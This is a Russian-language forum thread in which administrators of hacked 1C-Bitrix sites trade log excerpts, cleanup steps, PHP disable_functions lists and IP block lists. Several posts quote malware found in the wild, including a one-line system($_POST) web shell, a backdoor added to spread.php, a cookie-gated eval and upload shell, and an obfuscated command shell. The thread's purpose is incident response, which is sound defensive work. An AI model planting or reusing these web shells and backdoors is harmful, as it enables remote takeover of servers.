Разработчикам

Взломаны сайты в честь дня конституции украины

RSS

Пользователь 7093356

Заглянувший

Сообщений: 6 Регистрация: 03.03.2023

#476

03.03.2023 16:57:00

Цитата

написал:
Разбор того как работает взлом через POST к главной странице.

Первый запрос GET к корню, потом экплойт через POST. Спустя несколько секунд проверка шелла GET /5b186f810c33.php
Как лечить? Удалить в bx_root.php добавленный код if (isset($_POST["BX_STAT"]) && $_POST["BX_STAT"] <> "")

Возможно будет полезно кому то, у меня история крайне похожа, сайт упал, модифицированный htaccess хтмл файлы, да еще и ограничить вход с 1 ip толком не получается, но у меня не с POSTом дело у меня это выглядит так

Код
if(isset($_SERVER["BX_PERSONAL_ROOT"]) && $_SERVER["BX_PERSONAL_ROOT"] <> "") define("BX_PERSONAL_ROOT", $_SERVER["BX_PERSONAL_ROOT"]);

Я не могу назвать себя программистом, поэтому не могу найти источник проблемы, но если моя ситуация кому то поможет буду рад.

Пользователь 700243

Заглянувший

Сообщений: 11 Баллов: 1 Регистрация: 11.09.2018

#477

03.03.2023 17:09:16

Цитата

@Денис написал:

Цитата
Возможно будет полезно кому то, у меня история крайне похожа, сайт упал, модифицированный htaccess хтмл файлы, да еще и ограничить вход с 1 ip толком не получается, но у меня не с POSTом дело у меня это выглядит так

Код
if ( isset ( $_SERVER [ "BX_PERSONAL_ROOT" ]) && $_SERVER [ "BX_PERSONAL_ROOT" ] <> "" ) define( "BX_PERSONAL_ROOT" , $_SERVER [ "BX_PERSONAL_ROOT" ]);

Дык это нормальное содержимое bx_root.php, вот такой он в исходниках:

Код

<?
/*
$fname1 = __FILE__;
$fname2 = $_SERVER["DOCUMENT_ROOT"];
if(strpos($fname1, $fname2)!==0)
{
   $fname1 = realpath(__FILE__);
   $fname2 = realpath($_SERVER["DOCUMENT_ROOT"]);
}

if(strpos($fname1, $fname2)===0)
{
   $fname3 = RTrim($_SERVER["DOCUMENT_ROOT"], " /\\");
   $bx_root = substr($fname1, strlen($fname3));
   $bx_root = substr($bx_root, 0, strlen($bx_root) - strlen("/modules/main/include.php"));
}
else
   $bx_root = "/bitrix";

$bx_root = str_replace("\\", "/", $bx_root);
*/
$bx_root = "/bitrix";
define("BX_ROOT", $bx_root);

if(isset($_SERVER["BX_PERSONAL_ROOT"]) && $_SERVER["BX_PERSONAL_ROOT"] <> "")
   define("BX_PERSONAL_ROOT", $_SERVER["BX_PERSONAL_ROOT"]);
else
   define("BX_PERSONAL_ROOT", BX_ROOT);
?>

Пользователь 7093356

Заглянувший

Сообщений: 6 Регистрация: 03.03.2023

#478

03.03.2023 17:14:39

Цитата

написал:

Дык это нормальное содержимое bx_root.php, вот такой он в исходниках:

Тогда я уже не знаю куда смотреть, уже третий день валандаюсь с этой хренью, сегодня продлим лицензию и обновим платформу, но блин три дня.
Сначала подняли сайт прошерстили антивирусом, сайт работает, но хтмл файлы все равно появляются, хотя и пустые, просто шарики за ролики уже вылетают. Если обновление платформы не поможет то уже не знаю что делать

Пользователь 13618

Эксперт

Сообщений: 1342 Баллов: 226 Регистрация: 05.04.2011

Сертифицированный партнер

#479

03.03.2023 17:24:17

vvv476, у Вас на исследуемом сайте стоят все актуальные обновления движка Битрикса?

запросы с CSISO2022KR возможно просто проверочные, так сказать скан по базе доменов на уязвимость
если они есть в логах это ещё не значит, что они отработали и сайт уязвим ...

для проверки осталось только реализовать уязвимость и попробовать на своём сайте

сугубо по фактам - мне не попадалось ни одного зараженного сайта с установленными актуальными обновлениями, так что делайте выводы

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 13618

Эксперт

Сообщений: 1342 Баллов: 226 Регистрация: 05.04.2011

Сертифицированный партнер

#480

03.03.2023 17:28:04

Цитата
Солюшнс АВИ написал: вот такой он в исходниках:

в исходниках с закоментированным кодом?
если так, то я был лучшего мнения о команде программистов Битрикса

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 13618

Эксперт

Сообщений: 1342 Баллов: 226 Регистрация: 05.04.2011

Сертифицированный партнер

#481

03.03.2023 17:31:55

Цитата
vvv476 написал: Почему так - сказано в статье https://www.synacktiv.com/publications/php-filters-chain-what-is-it-and-how-to-use-it.html

переведите в 2х словах плиз

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 700243

Заглянувший

Сообщений: 11 Баллов: 1 Регистрация: 11.09.2018

#482

03.03.2023 17:50:16

Цитата
написал: в исходниках с закоментированным кодом? если так, то я был лучшего мнения о команде программистов Битрикса

да там в каждом втором файле какая-то лажа

Пользователь 7086178

Заглянувший

Сообщений: 6 Баллов: 2 Регистрация: 01.03.2023

#483

03.03.2023 17:53:18

Цитата

написал:
vvv476, у Вас на исследуемом сайте стоят все актуальные обновления движка Битрикса?

запросы с CSISO2022KR возможно просто проверочные, так сказать скан по базе доменов на уязвимость
если они есть в логах это ещё не значит, что они отработали и сайт уязвим ...

для проверки осталось только реализовать уязвимость и попробовать на своём сайте

сугубо по фактам - мне не попадалось ни одного зараженного сайта с установленными актуальными обновлениями, так что делайте выводы

Это не проверочные запросы, поверьте. Код который он несет

Код
<?php system($_POST["a"]); ?>

позволяет делать что угодно. Факт его удачного исполнения подтвержден кодом 200 сервера. К сожалению я не перехватил что именно было в параметре POST "a" того запроса, но характер последующих действий показал что после него началась эксплуатация сервера через bx_root.php про которую я писал выше. Тем, у кого дрянь вылезает после двух часов от бэкапа. Читайте логи веб-сервера. Фильтруйте, анализируйте. Если не найдете сами, пришлите мне.

Пользователь 298542

Заглянувший

Сообщений: 20 Баллов: 1 Регистрация: 05.12.2014

#484

03.03.2023 23:15:47

Антон Костин,

Цитата
написал: disable_functions = evil,exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source ... теперь собираю статистику что делают и куда ломятся ))

Более мене с не большими последствиями можно заблокировать вот эти
disable_functions = shell_exec,exec,passthru,system,proc_open,curl_multi_exec,parse_ini_file,show_source

exec:
catalog\export
catalog\import

system:
sale\location\import

proc_open:
scale

show_source:
fileman

очень много используется:
eval
curl_exec

Есть мысли как избавиться от использования eval в коде Bitrix что бы eval тоже можно заблокировать?

Пользователь 298542

Заглянувший

Сообщений: 20 Баллов: 1 Регистрация: 05.12.2014

#485

03.03.2023 23:22:37

vvv476,

Цитата
Или глобально stream_wrapper_unregister ('php')

Сломается не только php://filter а еще куча https://www.php.net/manual/ru/wrappers.php.php

Самое очевидные
php://input
php://output
php://temp

Пользователь 298542

Заглянувший

Сообщений: 20 Баллов: 1 Регистрация: 05.12.2014

#486

03.03.2023 23:29:06

Солюшнс АВИ,

Цитата
написал: А как глобально можно враппер отключить? Это же так или иначе надо в сам файл php прописать, не в каждый же?

В конфиг-файле php можно использовать auto_append_file

Пользователь 298542

Заглянувший

Сообщений: 20 Баллов: 1 Регистрация: 05.12.2014

#487

03.03.2023 23:37:48

А вообще права на папки и файлы не должны позволять изменять и создавать папки и файлы пользователю под которым веб-сервер запущен т.е. этому пользователю нужны права только чтение. В корне сайта есть папка /upload/ только в этой папке можно этому пользователю файлы создавать, но не запускать.

Пользователь 13618

Эксперт

Сообщений: 1342 Баллов: 226 Регистрация: 05.04.2011

Сертифицированный партнер

#488

04.03.2023 03:59:22

Цитата

xRayDev написал:
А вообще права на папки и файлы не должны позволять изменять и создавать папки и файлы пользователю под которым веб-сервер запущен т.е. этому пользователю нужны права только чтение. В корне сайта есть папка /upload/ только в этой папке можно этому пользователю файлы создавать, но не запускать.

/bitrix/ можно только на чтение поставить, кроме этих директорий
/bitrix/backup/
/bitrix/cache/
/bitrix/managed_cache/
/bitrix/stack_cache/
/bitrix/tmp/ - этот не знаю
ну и естественно при обновлениях движка права нужно будет вернуть

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 13618

Эксперт

Сообщений: 1342 Баллов: 226 Регистрация: 05.04.2011

Сертифицированный партнер

#489

04.03.2023 04:07:00

Цитата
vvv476 Код который он несет позволяет делать что угодно.

Согласен.

Цитата
vvv476 написал: Факт его удачного исполнения подтвержден кодом 200 сервера.

Не согласен. Код 200 говорит о том, что страница такая есть и POST туда улетел и не вернул ошибку, но это не значит, что он обработался.
Я вам на главную могу кинуть POST любого содержания и вернётся 200 но ничего не произойдёт.

Чтобы удостовериться "поймайте" тело этого запроса ($_POST и $_GET) выше я писал как это можно сделать и в личку мне скиньте.

На моих сайтах и сайтах клиентов никакая зараза не пробивается, так что сильно сомневаюсь в пробивных свойствах этого эксплойта.

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 13618

Эксперт

Сообщений: 1342 Баллов: 226 Регистрация: 05.04.2011

Сертифицированный партнер

#490

04.03.2023 04:08:04

Цитата

Алексей Вдовин написал:

Цитата
vvv476 Код который он несет позволяет делать что угодно.

Согласен.

Цитата
vvv476 написал: Факт его удачного исполнения подтвержден кодом 200 сервера.

Не согласен. Код 200 говорит о том, что страница такая есть и POST туда улетел и не вернул ошибку, но это не значит, что он обработался.
Я вам на главную могу кинуть POST любого содержания и вернётся 200 но ничего не произойдёт.

Чтобы удостовериться "поймайте" тело этого запроса ($_POST и $_GET) выше я писал как это можно сделать и в личку мне скиньте, возможно придётся ещё подработать ловилку чтобы передаваемый файл сохранить.

На моих сайтах и сайтах клиентов никакая зараза не пробивается, так что сильно сомневаюсь в пробивных свойствах этого эксплойта.

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 7086178

Заглянувший

Сообщений: 6 Баллов: 2 Регистрация: 01.03.2023

#491

04.03.2023 14:23:19

Цитата

написал:
На наши серверы стали постить не на главную страницу, а на /bitrix/tools/spread.php.
x185.106.94.82 - - [03/Mar/2023:09:01:42 +0300] "POST /bitrix/tools/spread.php HTTP/1.1" 403 124 "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:49.0) Gex
x185.106.94.82 - - [03/Mar/2023:09:01:42 +0300] "GET /bitrix/admin/1dbc26cfe5c3.php HTTP/1.1" 403 124 " "Mozilla/5.0 (Windows NT x
x185.106.94.82 - - [03/Mar/2023:09:01:42 +0300] "POST /bitrix/tools/spread.php HTTP/1.1" 403 124 "Mozilla/5.0 (Windows NTx
m185.106.94.82 - - [03/Mar/2023:09:01:42 +0300] "GET /bitrix/admin/1dbc26cfe5c3.php HTTP/1.1" 403 124 "Mozilla/5.0 (Windows NT

Предварительно заблочили весь ASN https://asn.ipinfo.app/AS210644 провайдера aeza, заметили что оттуда оосновная масса вредоносных запросов поступает. Блокировали через правила в nginx (через include запрещающих правил типа https://asn.ipinfo.app/api/text/nginx/AS210644 ). Репорт на абуз серверов отправлен дня 4 назад, пров молчит как партизан.

Знаю, что костыль и что это не решение проблемы, но пока так..

Загляните в spread.php. Найдете такой код:

Код
if(isset($_REQUEST["state"]) && is_string($_REQUEST["state"])) { $arState = array(); parse_str(base64_decode($_REQUEST["state"]), $arState); echo $arState[0]($arState[1],$arState[2]); die(); }

Методика та же что и в bx_root - Вызов любой функции с 2-мя аргументами пришедшими из интернета. Удалите или закомментриуйте его. Это тоже следствие. Причины пока ищу.

Пользователь 46525

Посетитель

Сообщений: 29 Баллов: 4 Регистрация: 03.08.2009

#492

04.03.2023 15:16:29

У меня появилась аналогичная проблема как и у всех с битрик в конце февраля.
Удалил десятки тысяч файлов .htaccess. Потом решил восстановить из бэкапа когда их еще не было.
Но потом как и выше сказано 1-2 раза в сутки начали появляться рандомные файлы с вирусами.
Прочитав все этот форум, решил обновиться... Этого очень давно не делал. php 5.6 стоял.
Купил лицензию, обновил, не все модули хотят обновляться.
Но все же решил переключить на php 8 и вот что выдает

Код

[Error] 
Undefined constant "Bitrix\Main\Diag\ASSERT_QUIET_EVAL" (0)
/var/www/u1315684/data/www/мой.сайт/bitrix/modules/main/lib/diag/exceptionhandler.php:244
#0: Bitrix\Main\Application->initializeExceptionHandler()
   /var/www/u1315684/data/www/мой.сайт/bitrix/modules/main/lib/application.php:105
#1: Bitrix\Main\Application->initializeBasicKernel()
   /var/www/u1315684/data/www/мой.сайт/bitrix/modules/main/start.php:164
#2: require_once(string)
   /var/www/u1315684/data/www/мой.сайт/bitrix/modules/main/include.php:10
#3: require_once(string)
   /var/www/u1315684/data/www/мой.сайт/bitrix/modules/main/include/prolog_admin_before.php:18
#4: require_once(string)
   /var/www/u1315684/data/www/мой.сайт/bitrix/modules/main/interface/desktop.php:2
#5: require(string)
   /var/www/u1315684/data/www/мой.сайт/bitrix/admin/index.php:2

Как корректно обновиться?
Буду благодарен помощи

Пользователь 46525

Посетитель

Сообщений: 29 Баллов: 4 Регистрация: 03.08.2009

#493

04.03.2023 15:45:53

Пробую еще как вариант пока тоже самое сделать на php 7, 7.2, 7.4 , результат не лучше

Код

[Error] Call to undefined function mysql_connect() (0)
/var/www/u1315684/data/www/мой.сайт/bitrix/modules/main/classes/mysql/database_mysql.php:19
#0: CDatabase->ConnectInternal()
   /var/www/u1315684/data/www/мой.сайт/bitrix/modules/main/classes/general/database.php:215
#1: CAllDatabase->DoConnect()
   /var/www/u1315684/data/www/мой.сайт/bitrix/modules/main/classes/mysql/database_mysql.php:74
#2: CDatabase->ForSql(string)
   /var/www/u1315684/data/www/мой.сайт/bitrix/modules/main/classes/general/main.php:4708
#3: CAllLanguage::GetList(NULL, NULL, array)
   /var/www/u1315684/data/www/мой.сайт/bitrix/modules/main/classes/mysql/main.php:47
#4: CMain->GetLang()
   /var/www/u1315684/data/www/мой.сайт/bitrix/modules/main/include.php:48
#5: require_once(string)
   /var/www/u1315684/data/www/мой.сайт/bitrix/modules/main/include/prolog_admin_before.php:18
#6: require_once(string)
   /var/www/u1315684/data/www/мой.сайт/bitrix/modules/main/interface/desktop.php:2
#7: require(string)
   /var/www/u1315684/data/www/мой.сайт/bitrix/admin/index.php:2

Пользователь 13618 Эксперт Сообщений: 1342 Баллов: 226 Регистрация: 05.04.2011 Сертифицированный партнер	#494 04.03.2023 16:53:15 Зачем Вы сюда это выкинули? У Вас есть действующая лицензия, обратитесь в службу поддержки. Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 515353

Заглянувший

Сообщений: 20 Баллов: 1 Регистрация: 04.03.2016

#495

04.03.2023 16:55:43

Ошибку с БД можно исправить, поправив 2 файла:

/bitrix/.settings.php замените

Код
'className' => '\\Bitrix\\Main\\DB\\MysqlConnection'

на

Код
'className' => '\\Bitrix\\Main\\DB\\MysqliConnection'

/bitrix/php_interface/dbconn.php добавьте
Код
define("BX_USE_MYSQLI", true);

Создание и поддержка сайтов: https://evgenydonich.ru

Пользователь 46525

Посетитель

Сообщений: 29 Баллов: 4 Регистрация: 03.08.2009

#496

04.03.2023 17:40:59

Цитата

написал:
Ошибку с БД можно исправить, поправив 2 файла:
/bitrix/.settings.php замените

Код
'className' => '\\Bitrix\\Main\\DB\\MysqlConnection'

на

Код
'className' => '\\Bitrix\\Main\\DB\\MysqliConnection'

/bitrix/php_interface/dbconn.php добавьте

Код
define( "BX_USE_MYSQLI" , true );

Спасибо! Получилось постепенно обновиться поочередно поднимая php

Пользователь 700243

Заглянувший

Сообщений: 11 Баллов: 1 Регистрация: 11.09.2018

#497

04.03.2023 20:33:15

А у меня вот таким теперь весь лог забит, перебирают порты:

Код

[Sat Mar 04 14:53:03.782421 2023] [access_compat:error] [pid 11862] [client 188.x.x.x:45338] AH01797: client denied by server configuration: /www/x-x.com/public_html/
[Sat Mar 04 14:53:06.298049 2023] [access_compat:error] [pid 610] [client 188.xxx.x.x:45346] AH01797: client denied by server configuration: /www/x-x.com/public_html/, referer: http://x-x.com/
[Sat Mar 04 14:53:34.792772 2023] [access_compat:error] [pid 11858] [client 188.x.x.x:52554] AH01797: client denied by server configuration: /www/x-x.com/public_html/04a9c540c814.php, referer: http://x-x.com/
[Sat Mar 04 14:53:34.977464 2023] [access_compat:error] [pid 27581] [client 188.x.x.x:52558] AH01797: client denied by server configuration: /www/x-x.com/public_html/, referer: http://x-x.com/04a9c540c814.php
[Sat Mar 04 14:53:35.135490 2023] [access_compat:error] [pid 14831] [client 188.x.x.x:52566] AH01797: client denied by server configuration: /www/x-x.com/public_html/04a9c540c814.php, referer: http://x-x.com/

Проблема в том, что 188.x.x.x — это адрес моего сервера, а referrer x-x.com — мой сайт. Типа подмена реферрера и IP? Левых процессов на сервере вроде не вижу, да и смысл ломится с сервера на него же тоже нет вроде бы. Нечисть с сайта вычистил, новая вроде не появляется. Заблочил пока по IP в htaccess сетку, которую камрады выше приводили, в htaccess:

Код

   Order Allow,Deny 
   Deny from 79.137.206.0/24
   Deny from 212.113.106.0/24
   Deny from 85.192.40.0/23
   Deny from 45.15.159.0/24
   Deny from 109.172.45.0/24
   Deny from 89.208.103.0/24
   Deny from 2a0e:d602:3::/48
   Deny from 79.137.207.0/24
   Deny from 2a0e:d602::/48
   Deny from 2a0e:d607::/48
   Deny from 2a0e:d602:2::/48
   Deny from 45.15.158.0/24
   Deny from 45.142.122.0/24
   Deny from 79.137.202.0/23
   Deny from 79.137.248.0/24
   Deny from 79.137.204.0/23
   Deny from 77.91.84.0/22
   Deny from 185.17.0.0/24
   Deny from 185.112.83.0/24
   Deny from 85.192.56.0/24
   Deny from 89.208.104.0/22
   Deny from 176.124.198.0/23
   Deny from 79.137.194.0/23
   Deny from 2a0e:d602:1::/48
   Deny from 212.113.119.0/24
   Deny from 77.91.78.0/24
   Deny from 45.138.74.0/24
   Deny from 80.85.241.0/24
   Deny from 85.192.63.0/24
   Deny from 5.252.118.0/24
   Deny from 212.113.116.0/24
   Deny from 185.229.65.0/24
   Deny from 78.153.130.0/24
   Deny from 185.174.137.0/24
   Deny from 185.106.94.0/24
   Deny from 77.73.131.0/24
   Deny from 91.193.43.0/24
   Deny from 79.137.196.0/22
   Deny from 194.26.229.0/24
   Deny from 195.20.16.0/24
   Deny from 185.229.66.0/24
   Deny from 89.185.85.0/24
   Deny from 185.174.136.0/24
   Deny from 2a0e:d606::/48
   Allow from all

зы С IP вроде бы разобрался — это глюк панели хостинга с криво настроенным mod_remote, но это не точно

Пользователь 10202

Заглянувший

Сообщений: 15 Баллов: 1 Регистрация: 18.03.2007

#498

05.03.2023 08:44:49

Кто-нибудь разобрался что дальше происходит после того, как приходит POST с таки содержимым на главную:

Код

(
   [bitrixxx] => file_put_contents($_SERVER['DOCUMENT_ROOT'].'/2a4e67218e9b.php','<?=409723*20;if(md5($_COOKIE[d])=="17028f487cb2a84607646da3ad3878ec"){echo"ok";eval(base64_decode($_REQUEST[id]));if($_POST["up"]=="up"){@copy($_FILES["file"]["tmp_name"],$_FILES["file"]["name"]);}}?>');
)

Попытка поискать файлы с текстом bitrixxx, а также повторить запрос через Postman не создает файл.

Пользователь 7086178

Заглянувший

Сообщений: 6 Баллов: 2 Регистрация: 01.03.2023

#499

05.03.2023 14:30:07

Внимательно перечитал всю тему. Большое спасибо авторам постов, вся информация о том как ломают и что делать здесь есть. Сведу все еще раз для таких как я - впервые увидевших 1С Битрикс. Сейчас есть 2 основные уязвимости для необновленных Битриксов. Это vote и html_editor_action. Пока не обновитесь, удалите найденные бэкдоры ( spread.php, bx_root.php, агенты и т.д. ) и поставьте заглушки в файлы:
/bitrix/tools/html_editor_action.php
/bitrix/tools/vote/uf.php

Приводит ли к взлому найденная мной последовательность в логах php://filter/convert.iconv.UTF8.CSISO2022KR выясню позже. Может это действительно был какой-то запрос не для Битрикса.

Пользователь 45908

Заглянувший

Сообщений: 1 Регистрация: 27.03.2017

#500

05.03.2023 15:03:46

Спасибо всем за эту тему. Мои пять копеек: на одном старом сайте (из пяти пострадавших) нашёл ещё три "подарка" в папке .git.

Палятся по тому, что git gc начинает ругаться "bad sha1..." с путём к файлам .git/objects/6a/e93177.php .git/objects/7a/c13cf3.php
внутри что-то вот такое (оставлено самое интересное, хостер бегет эти вещи спалил своим скриптом проверки,кстати)

Код

$down = "which get;which wget;which lynx;which curl;which fetch;which links;";
            $aTwo = "ba" . "se" . "6" . "4" . "_" . "en" . "co" . "de";
            $bTwo = "ba" . "se" . "6" . "4" . "_" . "de" . "co" . "de";
            $fun = $bTwo("cGhwIC1yICdwcmludF9yKGdldF9kZWZpbmVkX2Z1bmN0aW9ucygpKTsnIHwgZ3JlcCAtRSAnIChzeXN0ZW18ZXhlY3xzaGVsbF9leGVjfHBhc3N0aHJ1fHByb2Nfb3Blbnxwb3BlbnxjdXJsX2V4ZWN8Y3VybF9tdWx0aV9leGVjfHBhcnNlX2luaV9maWxlfHNob3dfc291cmNlKSc");
            if (isset($_POST['cmd'])) {
                echo '<pre>';
                $a1($_POST['cmd']);

и один "загрузчик фоточек для форума" в .git/objects/7a/c13cf3.php, внутри отличительные черты это строки

"648ae5b4a83b380bc7e163b26c28950b"

header('Content-Description: gallery Transfer');

Взломаны сайты в честь дня конституции украины

Продукты

Управление сайтом

Битрикс24

Интернет-магазин + CRM

Решения

Для интернет-магазинов

Каталог готовых решений

Внедрение

Выбрать партнера

Проверить партнера

Стать партнером